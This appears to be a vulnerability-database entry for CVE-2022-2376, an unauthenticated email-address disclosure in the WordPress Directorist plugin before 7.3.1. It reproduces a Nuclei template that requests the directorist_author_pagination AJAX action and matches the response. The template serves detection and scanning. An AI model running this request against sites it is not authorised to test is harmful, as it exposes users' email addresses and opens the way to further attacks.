CVE-2022-2376: WordPress Directorist <7.3.1 - Information Disclosure

日期: 2025-08-01 | 影响软件: WordPress Directorist | POC: 已公开

漏洞描述

WordPress Directorist plugin before 7.3.1 is susceptible to information disclosure. The plugin discloses the email address of all users in an AJAX action available to both unauthenticated and authenticated users.

PoC代码[已公开]

id: CVE-2022-2376

info:
  name: WordPress Directorist <7.3.1 - Information Disclosure
  author: Random-Robbie
  severity: medium
  description: WordPress Directorist plugin before 7.3.1 is susceptible to information disclosure. The plugin discloses the email address of all users in an AJAX action available to both unauthenticated and authenticated users.
  impact: |
    An attacker can gain sensitive information about the WordPress installation, potentially leading to further attacks.
  remediation: Fixed in version 7.3.1.
  reference:
    - https://wpscan.com/vulnerability/437c4330-376a-4392-86c6-c4c7ed9583ad
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2376
    - https://nvd.nist.gov/vuln/detail/CVE-2022-2376
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-2376
    cwe-id: CWE-862
    epss-score: 0.05048
    epss-percentile: 0.8936
    cpe: cpe:2.3:a:wpwax:directorist:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: wpwax
    product: directorist
    framework: wordpress
  tags: cve,cve2022,wp-plugin,wpscan,wordpress,wp,directorist,unauth,disclosure,wpwax

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-admin/admin-ajax.php?action=directorist_author_pagination'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'directorist-authors__card__details__top'
          - 'directorist-authors__card__info-list'
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a0046304402200ed2ca5c5c28076f6f458b33ec2ba38b9e8b508d5ac5b134a3c332af1f9d58f30220436095264f6e68b7d8cd4bc0010dfadd7c55c7470a148550ff245cffaad12473:922c64590222798bb761d5b6d8e72950